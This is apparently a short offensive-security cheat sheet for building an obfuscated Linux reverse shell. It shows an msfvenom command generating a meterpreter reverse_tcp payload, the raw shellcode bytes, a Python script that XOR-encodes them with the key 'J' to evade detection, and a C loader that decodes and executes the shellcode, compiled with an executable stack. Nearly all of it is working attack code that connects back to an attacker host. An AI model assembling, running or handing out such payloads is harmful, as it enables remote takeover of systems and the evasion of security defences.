-
Generate msfvenom in c:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT EXITFUNC=thread -f c -
Use the xor.py. Full code:
buf = bytearray([
0x6a, 0x39, 0x58, 0x0f, 0x05, 0x48, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xff, 0x6a, 0x3c, 0x58,
0x0f, 0x05, 0x6a, 0x39, 0x58, 0x0f, 0x05, 0x48, 0x85, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xff, 0x6a,
0x3c, 0x58, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x6a, 0x09, 0x58, 0x99, 0xb6, 0x10, 0x48, 0x89, 0xd6,
0x4d, 0x31, 0xc9, 0x6a, 0x22, 0x41, 0x5a, 0xb2, 0x07, 0x0f, 0x05, 0x48, 0x85, 0xc0, 0x78, 0x51,
0x6a, 0x0a, 0x41, 0x59, 0x50, 0x6a, 0x29, 0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f,
0x05, 0x48, 0x85, 0xc0, 0x78, 0x3b, 0x48, 0x97, 0x48, 0xb9, 0x02, 0x00, 0x05, 0x39, 0xc0, 0xa8,
0x76, 0x03, 0x51, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x59, 0x48,
0x85, 0xc0, 0x79, 0x25, 0x49, 0xff, 0xc9, 0x74, 0x18, 0x57, 0x6a, 0x23, 0x58, 0x6a, 0x00, 0x6a,
0x05, 0x48, 0x89, 0xe7, 0x48, 0x31, 0xf6, 0x0f, 0x05, 0x59, 0x59, 0x5f, 0x48, 0x85, 0xc0, 0x79,
0xc7, 0x6a, 0x3c, 0x58, 0x6a, 0x01, 0x5f, 0x0f, 0x05, 0x5e, 0x6a, 0x7e, 0x5a, 0x0f, 0x05, 0x48,
0x85, 0xc0, 0x78, 0xed, 0xff, 0xe6
])
xor_key = ord('J') # Convert the character 'J' to its ASCII code
encoded_payload = ""
for byte in buf:
encoded_payload += "\\x{:02X}".format(byte ^ xor_key)
print(encoded_payload)
- Use the following code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Our obfuscated shellcode
unsigned char buf[] = "\x20\x73\x12\x45\x4F\x02\xCF\x8A...x32\x71\x02\xDD\x02\xF3\x48";
int main (int argc, char **argv)
{
char xor_key = 'J';
int arraysize = (int) sizeof(buf);
for (int i=0; i<arraysize-1; i++)
{
buf[i] = buf[i]^xor_key;
}
int (*ret)() = (int(*)())buf;
ret();
}
- In Kali, run:
gcc -o hack.out hack.c -z execstack